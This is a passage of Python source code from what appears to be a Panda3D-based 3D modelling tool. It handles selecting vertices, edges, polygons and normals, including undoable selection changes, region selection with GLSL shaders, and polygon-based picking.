else:
unsel_normals = []
if sel_normal_ids:
tmp_shared_normal = Mgr.do("create_shared_normal", self, sel_normal_ids)
sel_id = tmp_shared_normal.id
original_shared_normals[sel_id] = shared_normals[sel_id]
shared_normals[sel_id] = tmp_shared_normal
sel_normals = [tmp_shared_normal]
else:
sel_normals = []
self.update_selection("normal", sel_normals, unsel_normals, False)
if unsel_normals:
shared_normals[unsel_id] = original_shared_normals[unsel_id]
if sel_normals:
shared_normals[sel_id] = original_shared_normals[sel_id]
self._update_verts_to_transform("normal")
for subobj_type in ("vert", "edge", "poly"):
subobjs = self._subobjs[subobj_type]
subobj_ids = data[subobj_type]
old_sel_subobj_ids = set(self._selected_subobj_ids[subobj_type])
new_sel_subobj_ids = set(subobj_ids)
sel_subobj_ids = new_sel_subobj_ids - old_sel_subobj_ids
unsel_subobj_ids = old_sel_subobj_ids - new_sel_subobj_ids
unsel_subobj_ids.intersection_update(subobjs)
unsel_subobjs = [subobjs[i] for i in unsel_subobj_ids]
sel_subobjs = [subobjs[i] for i in sel_subobj_ids]
if subobj_type in ("vert", "edge"):
merged_subobjs = self.merged_verts if subobj_type == "vert" else self.merged_edges
original_merged_subobjs = {}
if unsel_subobjs:
tmp_merged_subobj = Mgr.do(f"create_merged_{subobj_type}", self)
for subobj_id in unsel_subobj_ids:
tmp_merged_subobj.append(subobj_id)
unsel_id = tmp_merged_subobj.id
original_merged_subobjs[unsel_id] = merged_subobjs[unsel_id]
merged_subobjs[unsel_id] = tmp_merged_subobj
unsel_subobjs = [subobjs[unsel_id]]
if sel_subobjs:
tmp_merged_subobj = Mgr.do(f"create_merged_{subobj_type}", self)
for subobj_id in sel_subobj_ids:
tmp_merged_subobj.append(subobj_id)
sel_id = tmp_merged_subobj.id
original_merged_subobjs[sel_id] = merged_subobjs[sel_id]
merged_subobjs[sel_id] = tmp_merged_subobj
sel_subobjs = [subobjs[sel_id]]
self.update_selection(subobj_type, sel_subobjs, unsel_subobjs, False)
if subobj_type in ("vert", "edge"):
if unsel_subobjs:
merged_subobjs[unsel_id] = original_merged_subobjs[unsel_id]
if sel_subobjs:
merged_subobjs[sel_id] = original_merged_subobjs[sel_id]
self._update_verts_to_transform(subobj_type)
class Selection(TransformMixin):
def __init__(self, obj_level, subobjs):
TransformMixin.__init__(self)
self._objs = subobjs
self._obj_level = obj_level
self._groups = {}
for obj in subobjs:
self._groups.setdefault(obj.geom_data_obj, []).append(obj)
def __getitem__(self, index):
try:
return self._objs[index]
except IndexError:
raise IndexError("Index out of range.")
except TypeError:
raise TypeError("Index must be an integer value.")
def __len__(self):
return len(self._objs)
def get_geom_data_objects(self):
return list(self._groups)
def get_toplevel_objects(self, get_group=False):
return [geom_data_obj.get_toplevel_object(get_group) for geom_data_obj in self._groups]
def get_toplevel_object(self, get_group=False):
""" Return a random top-level object """
if self._groups:
return list(self._groups.keys())[0].get_toplevel_object(get_group)
@property
def toplevel_obj(self):
return self.get_toplevel_object()
def get_subobjects(self, geom_data_obj):
return self._groups.get(geom_data_obj, [])
def update(self, hide_sets=False):
self.update_center_pos()
self.update_ui()
if hide_sets:
Mgr.update_remotely("selection_set", "hide_name")
def add(self, subobjs, add_to_hist=True):
sel = self._objs
old_sel = set(sel)
sel_to_add = set(subobjs)
common = old_sel & sel_to_add
if common:
sel_to_add -= common
if not sel_to_add:
return False
geom_data_objs = {}
groups = self._groups
for obj in sel_to_add:
geom_data_obj = obj.geom_data_obj
geom_data_objs.setdefault(geom_data_obj, []).append(obj)
groups.setdefault(geom_data_obj, []).append(obj)
for geom_data_obj, objs in geom_data_objs.items():
geom_data_obj.update_selection(self._obj_level, objs, [])
sel.extend(sel_to_add)
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
if add_to_hist:
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Add to {subobj_descr[self._obj_level]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("prop_change", "subobj_selection")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data)
return True
def remove(self, subobjs, add_to_hist=True):
sel = self._objs
old_sel = set(sel)
sel_to_remove = set(subobjs)
common = old_sel & sel_to_remove
if not common:
return False
geom_data_objs = {}
groups = self._groups
for obj in common:
sel.remove(obj)
geom_data_obj = obj.geom_data_obj
geom_data_objs.setdefault(geom_data_obj, []).append(obj)
groups[geom_data_obj].remove(obj)
if not groups[geom_data_obj]:
del groups[geom_data_obj]
for geom_data_obj, objs in geom_data_objs.items():
geom_data_obj.update_selection(self._obj_level, [], objs)
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
if add_to_hist:
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Remove from {subobj_descr[self._obj_level]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("prop_change", "subobj_selection")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data)
return True
def replace(self, subobjs, add_to_hist=True):
sel = self._objs
old_sel = set(sel)
new_sel = set(subobjs)
common = old_sel & new_sel
if common:
old_sel -= common
new_sel -= common
if not (old_sel or new_sel):
return False
geom_data_objs = {}
for old_obj in old_sel:
sel.remove(old_obj)
geom_data_obj = old_obj.geom_data_obj
geom_data_objs.setdefault(geom_data_obj, {"sel": [], "desel": []})["desel"].append(old_obj)
for new_obj in new_sel:
geom_data_obj = new_obj.geom_data_obj
geom_data_objs.setdefault(geom_data_obj, {"sel": [], "desel": []})["sel"].append(new_obj)
for geom_data_obj, objs in geom_data_objs.items():
geom_data_obj.update_selection(self._obj_level, objs["sel"], objs["desel"])
sel.extend(new_sel)
self._groups = groups = {}
for obj in common | new_sel:
groups.setdefault(obj.geom_data_obj, []).append(obj)
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
if add_to_hist and geom_data_objs:
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Replace {subobj_descr[self._obj_level]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("prop_change", "subobj_selection")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data)
return True
def clear(self, add_to_hist=True):
if not self._objs:
return False
obj_lvl = self._obj_level
geom_data_objs = []
for geom_data_obj in self._groups:
geom_data_obj.clear_selection(obj_lvl)
geom_data_objs.append(geom_data_obj)
self._groups = {}
self._objs = []
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
if add_to_hist:
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Clear {subobj_descr[obj_lvl]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("prop_change", "subobj_selection")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data)
return True
def delete(self, add_to_hist=True):
obj_lvl = self._obj_level
if obj_lvl == "normal":
return False
if not self._objs:
return False
geom_data_objs = list(self._groups.keys())
self._groups = {}
self._objs = []
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
for geom_data_obj in geom_data_objs:
geom_data_obj.delete_selection(obj_lvl)
if add_to_hist:
Mgr.do("update_history_time")
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Delete {subobj_descr[obj_lvl]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("subobj_change")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data, update_time_id=False)
return True
# subobject selection manager
class SelectionManager:
def __init__(self):
self._color_id = None
self._selections = {}
self._prev_obj_lvl = None
self._next_selection = None
self._selection_op = "replace"
# the following variables are used to pick a subobject using its polygon
self._picked_poly = None
self._tmp_color_id = None
self._cursor_id = ""
self._pixel_under_mouse = None
self._aux_pixel_under_mouse = None
np = NodePath("poly_sel_state")
poly_sel_state_off = np.get_state()
tex_stage = TextureStage("poly_selection")
tex_stage.sort = 100
tex_stage.priority = -1
tex_stage.mode = TextureStage.M_add
np.set_transparency(TransparencyAttrib.M_none)
projector = GD.cam.projector
np.set_tex_gen(tex_stage, RenderAttrib.M_world_position)
np.set_tex_projector(tex_stage, GD.world, projector)
tex = Texture()
tex.read(Filename(GFX_PATH + "sel_tex.png"))
np.set_texture(tex_stage, tex)
red = VBase4(1., 0., 0., 1.)
material = Material("poly_selection")
material.diffuse = red
material.emission = red * .3
np.set_material(material)
poly_sel_state = np.get_state()
poly_sel_effects = np.get_effects()
color = VBase4(0., .7, .5, 1.)
material = Material("temp_poly_selection")
material.diffuse = color
material.emission = color * .3
np.set_material(material)
tmp_poly_sel_state = np.get_state()
Mgr.expose("poly_selection_state_off", lambda: poly_sel_state_off)
Mgr.expose("poly_selection_state", lambda: poly_sel_state)
Mgr.expose("poly_selection_effects", lambda: poly_sel_effects)
Mgr.expose("temp_poly_selection_state", lambda: tmp_poly_sel_state)
vert_colors = {"selected": (1., 0., 0., 1.), "unselected": (.5, .5, 1., 1.)}
edge_colors = {"selected": (1., 0., 0., 1.), "unselected": (1., 1., 1., 1.)}
normal_colors = {"selected": (1., 0.3, 0.3, 1.), "unselected": (.75, .75, 0., 1.),
"locked_sel": (0.75, 0.3, 1., 1.), "locked_unsel": (0.3, 0.5, 1., 1.)}
subobj_sel_colors = {"vert": vert_colors, "edge": edge_colors, "normal": normal_colors}
Mgr.expose("subobj_selection_colors", lambda: subobj_sel_colors)
Mgr.expose("selection_vert", lambda: self._selections["vert"])
Mgr.expose("selection_edge", lambda: self._selections["edge"])
Mgr.expose("selection_poly", lambda: self._selections["poly"])
Mgr.expose("selection_normal", lambda: self._selections["normal"])
Mgr.expose("subobj_selection_set", self.__get_selection_set)
Mgr.accept("update_selection_vert", lambda: self.__update_selection("vert"))
Mgr.accept("update_selection_edge", lambda: self.__update_selection("edge"))
Mgr.accept("update_selection_poly", lambda: self.__update_selection("poly"))
Mgr.accept("update_selection_normal", lambda: self.__update_selection("normal"))
Mgr.accept("select_vert", lambda *args: self.__init_select("vert", *args))
Mgr.accept("select_edge", lambda *args: self.__init_select("edge", *args))
Mgr.accept("select_poly", lambda *args: self.__init_select("poly", *args))
Mgr.accept("select_normal", lambda *args: self.__init_select("normal", *args))
Mgr.accept("select_single_vert", lambda: self.__select_single("vert"))
Mgr.accept("select_single_edge", lambda: self.__select_single("edge"))
Mgr.accept("select_single_poly", lambda: self.__select_single("poly"))
Mgr.accept("select_single_normal", lambda: self.__select_single("normal"))
Mgr.accept("inverse_select_subobjs", self.__inverse_select)
Mgr.accept("select_all_subobjs", self.__select_all)
Mgr.accept("clear_subobj_selection", self.__select_none)
Mgr.accept("apply_subobj_selection_set", self.__apply_selection_set)
Mgr.accept("region_select_subobjs", self.__region_select)
Mgr.accept("init_selection_via_poly", self.__init_selection_via_poly)
Mgr.add_app_updater("active_obj_level", lambda: self.__clear_prev_selection(True))
Mgr.add_app_updater("picking_via_poly", self.__set_subobj_picking_via_poly)
Mgr.add_app_updater("subobj_sel_conversion", self.__convert_subobj_selection)
Mgr.add_app_updater("viewport", self.__handle_viewport_resize)
add_state = Mgr.add_state
add_state("picking_via_poly", -1, self.__init_subobj_picking_via_poly)
bind = Mgr.bind_state
bind("picking_via_poly", "select subobj via poly",
"mouse1-up", self.__select_subobj_via_poly)
bind("picking_via_poly", "cancel subobj select via poly",
"mouse3", self.__cancel_select_via_poly)
status_data = GD["status"]
info = "LMB-drag over subobject to pick it; RMB to cancel"
status_data["picking_via_poly"] = {"mode": "Pick subobject", "info": info}
def __handle_viewport_resize(self):
# Maintain the size and aspect ratio of the polygon selection texture.
w, h = GD["viewport"]["size_aux" if GD["viewport"][2] == "main" else "size"]
lenses = GD.cam.projector_lenses
lens_persp = lenses["persp"]
lens_persp.fov = 2. * math.degrees(math.atan(2.5 / max(w, h)))
lens_ortho = lenses["ortho"]
lens_ortho.film_size = 2000. / max(w, h)
def __clear_prev_selection(self, check_top=False):
obj_lvl = GD["active_obj_level"]
if check_top and obj_lvl != "top":
return
if self._prev_obj_lvl:
self._selections[self._prev_obj_lvl] = None
self._prev_obj_lvl = None
selection = Mgr.get("selection_top")
sel_count = len(selection)
obj = selection[0]
geom_data_obj = obj.geom_obj.geom_data_obj
for prop_id in geom_data_obj.get_type_property_ids(obj_lvl):
value = geom_data_obj.get_property(prop_id, for_remote_update=True, obj_lvl=obj_lvl)
value = (value, sel_count)
Mgr.update_remotely("selected_obj_prop", "unlocked_geom", prop_id, value)
def __update_selection(self, obj_lvl):
self.__clear_prev_selection()
subobjs = []
for obj in Mgr.get("selection_top"):
subobjs.extend(obj.get_subobj_selection(obj_lvl))
self._selections[obj_lvl] = sel = Selection(obj_lvl, subobjs)
if self._next_selection is not None:
sel.replace(self._next_selection)
self._next_selection = None
sel.update()
self._prev_obj_lvl = obj_lvl
Mgr.update_remotely("selection_set", "hide_name")
def __get_all_combined_subobjs(self, obj_lvl):
subobjs = []
geom_data_objs = [m.geom_obj.geom_data_obj for m in Mgr.get("selection_top")]
if obj_lvl == "vert":
for geom_data_obj in geom_data_objs:
subobjs.extend(geom_data_obj.merged_verts.values())
elif obj_lvl == "edge":
for geom_data_obj in geom_data_objs:
subobjs.extend(geom_data_obj.merged_edges.values())
elif obj_lvl == "normal":
for geom_data_obj in geom_data_objs:
subobjs.extend(geom_data_obj.shared_normals.values())
elif obj_lvl == "poly":
for geom_data_obj in geom_data_objs:
subobjs.extend(geom_data_obj.get_subobjects("poly").values())
return subobjs
def __inverse_select(self):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
old_sel = set(selection)
new_sel = set(self.__get_all_combined_subobjs(obj_lvl))
selection.replace(new_sel - old_sel)
Mgr.update_remotely("selection_set", "hide_name")
def __select_all(self):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
selection.replace(self.__get_all_combined_subobjs(obj_lvl))
Mgr.update_remotely("selection_set", "hide_name")
def __select_none(self):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
selection.clear()
Mgr.update_remotely("selection_set", "hide_name")
def __get_selection_set(self):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
if obj_lvl == "poly":
return set(obj.id for obj in selection)
else:
return set(obj_id for obj in selection for obj_id in obj)
def __apply_selection_set(self, sel_set):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
geom_data_objs = [m.geom_obj.geom_data_obj for m in Mgr.get("selection_top")]
combined_subobjs = {}
if obj_lvl == "vert":
for geom_data_obj in geom_data_objs:
combined_subobjs.update(geom_data_obj.merged_verts)
elif obj_lvl == "edge":
for geom_data_obj in geom_data_objs:
combined_subobjs.update(geom_data_obj.merged_edges)
elif obj_lvl == "normal":
for geom_data_obj in geom_data_objs:
combined_subobjs.update(geom_data_obj.shared_normals)
elif obj_lvl == "poly":
for geom_data_obj in geom_data_objs:
combined_subobjs.update(geom_data_obj.get_subobjects("poly"))
new_sel = set(combined_subobjs.get(obj_id) for obj_id in sel_set)
new_sel.discard(None)
selection.replace(new_sel)
def __init_select(self, obj_lvl, picked_obj, op):
self._selection_op = op
if obj_lvl == "vert":
if GD["subobj_edit_options"]["pick_via_poly"]:
obj = picked_obj if picked_obj and picked_obj.type == "poly" else None
self._picked_poly = obj
else:
obj = picked_obj.merged_vertex if picked_obj else None
elif obj_lvl == "edge":
if GD["subobj_edit_options"]["pick_via_poly"]:
obj = picked_obj if picked_obj and picked_obj.type == "poly" else None
if obj and GD["subobj_edit_options"]["sel_edges_by_border"]:
merged_edges = obj.geom_data_obj.merged_edges
for edge_id in obj.edge_ids:
if len(merged_edges[edge_id]) == 1:
break
else:
obj = None
self._picked_poly = obj
else:
obj = picked_obj.merged_edge if picked_obj else None
if obj and GD["subobj_edit_options"]["sel_edges_by_border"] and len(obj) > 1:
obj = None
elif obj_lvl == "normal":
if GD["subobj_edit_options"]["pick_via_poly"]:
obj = picked_obj if picked_obj and picked_obj.type == "poly" else None
self._picked_poly = obj
else:
obj = picked_obj.shared_normal if picked_obj else None
elif obj_lvl == "poly":
obj = picked_obj
if self._picked_poly:
Mgr.enter_state("picking_via_poly")
return False, False
self._color_id = obj.picking_color_id if obj else None
r = self.__select(obj_lvl)
selection = self._selections[obj_lvl]
if not (obj and obj in selection):
obj = selection[0] if selection else None
if obj:
cs_type = GD["coord_sys_type"]
tc_type = GD["transf_center_type"]
toplvl_obj = obj.toplevel_obj
if cs_type == "local":
Mgr.update_locally("coord_sys", cs_type, toplvl_obj)
if tc_type == "pivot":
Mgr.update_locally("transf_center", tc_type, toplvl_obj)
return r
def __select(self, obj_lvl, ignore_transform=False):
if obj_lvl == "normal":
obj = Mgr.get("vert", self._color_id)
else:
obj = Mgr.get(obj_lvl, self._color_id)
if obj_lvl == "vert":
obj = obj.merged_vertex if obj else None
elif obj_lvl == "edge":
obj = obj.merged_edge if obj else None
elif obj_lvl == "normal":
obj = obj.shared_normal if obj else None
selection = self._selections[obj_lvl]
can_select_single = False
start_mouse_checking = False
op = self._selection_op
if obj:
if op == "replace":
if GD["active_transform_type"] and not ignore_transform:
if obj in selection and len(selection) > 1:
# When the user clicks one of multiple selected objects, updating the
# selection must be delayed until it is clear whether he wants to
# transform the entire selection or simply have only this object
# selected (this is determined by checking if the mouse has moved at
# least a certain number of pixels by the time the left mouse button
# is released).
can_select_single = True
else:
selection.replace(obj.special_selection)
start_mouse_checking = True
else:
selection.replace(obj.special_selection)
elif op == "add":
selection.add(obj.special_selection)
transform_allowed = GD["active_transform_type"]
if transform_allowed:
start_mouse_checking = True
elif op == "remove":
selection.remove(obj.special_selection)
elif op == "toggle":
old_sel = set(selection)
new_sel = set(obj.special_selection)
selection.replace(old_sel ^ new_sel)
if obj in selection:
transform_allowed = GD["active_transform_type"]
else:
transform_allowed = False
if transform_allowed:
start_mouse_checking = True
elif op == "replace":
selection.clear()
Mgr.update_remotely("selection_set", "hide_name")
return can_select_single, start_mouse_checking
def __select_single(self, obj_lvl):
# If multiple objects were selected and no transformation occurred, a single
# object has been selected out of that previous selection.
if obj_lvl == "normal":
obj = Mgr.get("vert", self._color_id)
else:
obj = Mgr.get(obj_lvl, self._color_id)
if obj_lvl == "vert":
obj = obj.merged_vertex if obj else None
elif obj_lvl == "edge":
obj = obj.merged_edge if obj else None
elif obj_lvl == "normal":
obj = obj.shared_normal if obj else None
self._selections[obj_lvl].replace(obj.special_selection)
def __region_select(self, cam, lens_exp, tex_buffer, ellipse_data, mask_tex, op):
obj_lvl = GD["active_obj_level"]
subobjs = {}
index_offset = 0
for obj in Mgr.get("selection_top"):
geom_data_obj = obj.geom_obj.geom_data_obj
obj_type = "vert" if obj_lvl == "normal" else obj_lvl
indexed_subobjs = geom_data_obj.get_indexed_subobjects(obj_type)
for index, subobj in indexed_subobjs.items():
subobjs[index + index_offset] = subobj
geom_data_obj.origin.set_shader_input("index_offset", index_offset)
index_offset += len(indexed_subobjs)
ge = GD.graphics_engine
obj_count = len(subobjs)
region_type = GD["region_select"]["type"]
subobj_edit_options = GD["subobj_edit_options"]
pick_via_poly = subobj_edit_options["pick_via_poly"]
if pick_via_poly:
Mgr.update_locally("picking_via_poly", False)
def region_select_objects(sel, enclose=False):
tex = Texture()
tex.setup_1d_texture(obj_count, Texture.T_int, Texture.F_r32i)
tex.clear_color = (0., 0., 0., 0.)
sh = shaders.region_sel
if "rect" in region_type or "square" in region_type:
fs = sh.FRAG_SHADER_INV if enclose else sh.FRAG_SHADER
elif "ellipse" in region_type or "circle" in region_type:
fs = sh.FRAG_SHADER_ELLIPSE_INV if enclose else sh.FRAG_SHADER_ELLIPSE
else:
fs = sh.FRAG_SHADER_FREE_INV if enclose else sh.FRAG_SHADER_FREE
if obj_lvl == "normal":
sh = shaders.region_sel_normal
vs = sh.VERT_SHADER
gs = sh.GEOM_SHADER
shader = Shader.make(Shader.SL_GLSL, vs, fs, gs)
else:
vs = shaders.region_sel_subobj.VERT_SHADER
shader = Shader.make(Shader.SL_GLSL, vs, fs)
state_np = NodePath("state_np")
state_np.set_shader(shader, 1)
state_np.set_shader_input("selections", tex, read=False, write=True)
if "ellipse" in region_type or "circle" in region_type:
state_np.set_shader_input("ellipse_data", Vec4(*ellipse_data))
elif region_type in ("fence", "lasso", "paint"):
if enclose:
img = PNMImage()
mask_tex.store(img)
img.expand_border(2, 2, 2, 2, (0., 0., 0., 0.))
mask_tex.load(img)
state_np.set_shader_input("mask_tex", mask_tex)
elif enclose:
w_b, h_b = tex_buffer.get_size()
state_np.set_shader_input("buffer_size", Vec2(w_b + 2, h_b + 2))
state = state_np.get_state()
cam.node().initial_state = state
ge.render_frame()
if ge.extract_texture_data(tex, GD.window.get_gsg()):
texels = memoryview(tex.get_ram_image()).cast("I")
if obj_lvl == "edge":
sel_edges_by_border = subobj_edit_options["sel_edges_by_border"]
for i, mask in enumerate(texels):
for j in range(32):
if mask & (1 << j):
index = 32 * i + j
subobj = subobjs[index].merged_subobj
if not sel_edges_by_border or len(subobj) == 1:
sel.update(subobj.special_selection)
elif obj_lvl == "normal":
for i, mask in enumerate(texels):
for j in range(32):
if mask & (1 << j):
index = 32 * i + j
subobj = subobjs[index].shared_normal
sel.update(subobj.special_selection)
else:
for i, mask in enumerate(texels):
for j in range(32):
if mask & (1 << j):
index = 32 * i + j
subobj = subobjs[index].merged_subobj
sel.update(subobj.special_selection)
state_np.clear_attrib(ShaderAttrib)
new_sel = set()
region_select_objects(new_sel)
ge.remove_window(tex_buffer)
if GD["region_select"]["enclose"]:
w_b, h_b = tex_buffer.get_size()
bfr_exp = GD.window.make_texture_buffer("tex_buffer_exp", w_b + 4, h_b + 4)
GD.showbase.make_camera(bfr_exp, useCamera=cam)
cam.node().set_lens(lens_exp)
inverse_sel = set()
region_select_objects(inverse_sel, True)
new_sel -= inverse_sel
ge.remove_window(bfr_exp)
if pick_via_poly:
Mgr.update_locally("picking_via_poly", True)
selection = self._selections[obj_lvl]
if op == "replace":
selection.replace(new_sel)
elif op == "add":
selection.add(new_sel)
elif op == "remove":
selection.remove(new_sel)
elif op == "toggle":
old_sel = set(selection)
selection.replace(old_sel ^ new_sel)
def __set_subobj_picking_via_poly(self, via_poly=False):
GD["subobj_edit_options"]["pick_via_poly"] = via_poly
if not via_poly:
models = Mgr.get("model_objs")
for model in models:
if model.geom_type == "unlocked_geom":
geom_data_obj = model.geom_obj.geom_data_obj
geom_data_obj.restore_selection_backup("poly")
obj_lvl = GD["active_obj_level"]
if obj_lvl not in ("vert", "edge", "normal"):
return
for obj in Mgr.get("selection_top"):
if obj.type == "model" and obj.geom_type == "unlocked_geom":
obj.geom_obj.geom_data_obj.init_subobj_picking(obj_lvl)
def __init_selection_via_poly(self, picked_poly, op):
if picked_poly:
Mgr.get("transf_gizmo").set_pickable(False)
self._picked_poly = picked_poly
self._selection_op = op
Mgr.enter_state("picking_via_poly")
def __init_subobj_picking_via_poly(self, prev_state_id, active):
Mgr.add_task(self.__hilite_subobj, "hilite_subobj")
Mgr.remove_task("update_cursor")
subobj_lvl = GD["active_obj_level"]
if subobj_lvl == "edge" and GD["subobj_edit_options"]["sel_edges_by_border"]:
category = "border"
else:
category = ""
geom_data_obj = self._picked_poly.geom_data_obj
geom_data_obj.init_subobj_picking_via_poly(subobj_lvl, self._picked_poly, category)
# temporarily select picked poly
geom_data_obj.update_selection("poly", [self._picked_poly], [], False)
for model in Mgr.get("selection_top"):
other_geom_data_obj = model.geom_obj.geom_data_obj
if other_geom_data_obj is not geom_data_obj:
other_geom_data_obj.set_pickable(False)
Mgr.update_app("status", ["picking_via_poly"])
cs_type = GD["coord_sys_type"]
tc_type = GD["transf_center_type"]
toplvl_obj = self._picked_poly.toplevel_obj
if cs_type == "local":
Mgr.update_locally("coord_sys", cs_type, toplvl_obj)
if tc_type == "pivot":
Mgr.update_locally("transf_center", tc_type, toplvl_obj)
def __hilite_subobj(self, task):
pixel_under_mouse = Mgr.get("pixel_under_mouse")
active_transform_type = GD["active_transform_type"]
if self._pixel_under_mouse != pixel_under_mouse:
if pixel_under_mouse == VBase4():
if active_transform_type and self._tmp_color_id is not None:
self.__select_subobj_via_poly(transform=True)
return
else:
r, g, b, a = [int(round(c * 255.)) for c in pixel_under_mouse]
color_id = r << 16 | g << 8 | b
geom_data_obj = self._picked_poly.geom_data_obj
subobj_lvl = GD["active_obj_level"]
# highlight temporary subobject
if geom_data_obj.hilite_temp_subobject(subobj_lvl, color_id):
self._tmp_color_id = color_id
self._pixel_under_mouse = pixel_under_mouse
color = tuple(round(c * 255.) for c in pixel_under_mouse)
not_hilited = color in ((0., 0., 0., 0.), (255., 255., 255., 255.))
cursor_id = "main" if not_hilited else ("select" if not active_transform_type
else active_transform_type)
if GD["subobj_edit_options"]["pick_by_aiming"]:
aux_pixel_under_mouse = Mgr.get("aux_pixel_under_mouse")
if not_hilited or self._aux_pixel_under_mouse != aux_pixel_under_mouse:
if not_hilited and aux_pixel_under_mouse != VBase4():
r, g, b, a = [int(round(c * 255.)) for c in aux_pixel_under_mouse]
color_id = r << 16 | g << 8 | b
geom_data_obj = self._picked_poly.geom_data_obj
subobj_lvl = GD["active_obj_level"]
# highlight temporary subobject
if geom_data_obj.hilite_temp_subobject(subobj_lvl, color_id):
self._tmp_color_id = color_id
cursor_id = "select" if not active_transform_type else active_transform_type
self._aux_pixel_under_mouse = aux_pixel_under_mouse
if self._cursor_id != cursor_id:
Mgr.set_cursor(cursor_id)
self._cursor_id = cursor_id
return task.cont
def __select_subobj_via_poly(self, transform=False):
Mgr.remove_task("hilite_subobj")
Mgr.enter_state("selection_mode")
subobj_lvl = GD["active_obj_level"]
geom_data_obj = self._picked_poly.geom_data_obj
if self._tmp_color_id is None:
obj = None
else:
if subobj_lvl == "vert":
vert_id = Mgr.get("vert", self._tmp_color_id).id
obj = geom_data_obj.get_merged_vertex(vert_id)
elif subobj_lvl == "edge":
edge_id = Mgr.get("edge", self._tmp_color_id).id
obj = geom_data_obj.get_merged_edge(edge_id)
obj = (None if GD["subobj_edit_options"]["sel_edges_by_border"]
and len(obj) > 1 else obj)
elif subobj_lvl == "normal":
vert_id = Mgr.get("vert", self._tmp_color_id).id
obj = geom_data_obj.get_shared_normal(vert_id)
self._color_id = obj.picking_color_id if obj else None
ignore_transform = not transform
self.__select(subobj_lvl, ignore_transform)
geom_data_obj.prepare_subobj_picking_via_poly(subobj_lvl)
for model in Mgr.get("selection_top"):
other_geom_data_obj = model.geom_obj.geom_data_obj
if other_geom_data_obj is not geom_data_obj:
other_geom_data_obj.set_pickable()
self._picked_poly = None
self._tmp_color_id = None
self._cursor_id = ""
self._pixel_under_mouse = None
self._aux_pixel_under_mouse = None
active_transform_type = GD["active_transform_type"]
if transform and obj and obj.geom_data_obj.is_selected(obj):
if active_transform_type == "translate":
picked_point = obj.get_center_pos(GD.world)
elif GD.mouse_watcher.has_mouse():
screen_pos = Point2(GD.mouse_watcher.get_mouse())
picked_point = obj.get_point_at_screen_pos(screen_pos)
else:
picked_point = None
if picked_point:
selection = self._selections[subobj_lvl]
selection.update(hide_sets=True)
Mgr.do("init_transform", picked_point)
Mgr.set_cursor(active_transform_type)
if active_transform_type:
Mgr.get("transf_gizmo").set_pickable()
def __cancel_select_via_poly(self):
Mgr.remove_task("hilite_subobj")
Mgr.enter_state("selection_mode")
subobj_lvl = GD["active_obj_level"]
geom_data_obj = self._picked_poly.geom_data_obj
geom_data_obj.prepare_subobj_picking_via_poly(subobj_lvl)
for model in Mgr.get("selection_top"):
other_geom_data_obj = model.geom_obj.geom_data_obj
if other_geom_data_obj is not geom_data_obj:
other_geom_data_obj.set_pickable()
self._picked_poly = None
self._tmp_color_id = None
self._cursor_id = ""
self._pixel_under_mouse = None
self._aux_pixel_under_mouse = None
if GD["active_transform_type"]:
Mgr.get("transf_gizmo").set_pickable()
def __convert_subobj_selection_touching(self, next_subobj_lvl):
subobj_lvl = GD["active_obj_level"]
self._next_selection = next_sel = set()
selection = self._selections[subobj_lvl]
if not selection:
return
if next_subobj_lvl == "normal":
for subobj in selection:
next_sel.update(v.shared_normal for v in subobj.connected_verts)
else:
for subobj in selection:
next_sel.update(s.merged_subobj for s in
subobj.get_connected_subobjs(next_subobj_lvl))
def __convert_subobj_selection_containing(self, next_subobj_lvl):
lvls = {"vert": 0, "normal": 0, "edge": 1, "poly": 2}
subobj_lvl = GD["active_obj_level"]
self._next_selection = next_sel = set()
selection = self._selections[subobj_lvl]
if not selection:
return
if subobj_lvl == "edge" and next_subobj_lvl == "normal":
for merged_edge in selection:
next_sel.update(v.shared_normal for v in merged_edge.vertices)
elif subobj_lvl == "poly" and next_subobj_lvl == "normal":
for poly in selection:
next_sel.update(v.shared_normal for v in poly.vertices)
elif subobj_lvl == "poly" and next_subobj_lvl == "edge":
for poly in selection:
next_sel.update(e.merged_edge for e in poly.edges)
elif lvls[next_subobj_lvl] > lvls[subobj_lvl]:
if next_subobj_lvl == "edge":
for subobj in selection:
if subobj_lvl == "vert":
next_sel.update(e.merged_edge for e in subobj.connected_edges
if all(v.merged_vertex in selection for v in e.vertices))
else: # subobj_lvl == "normal"
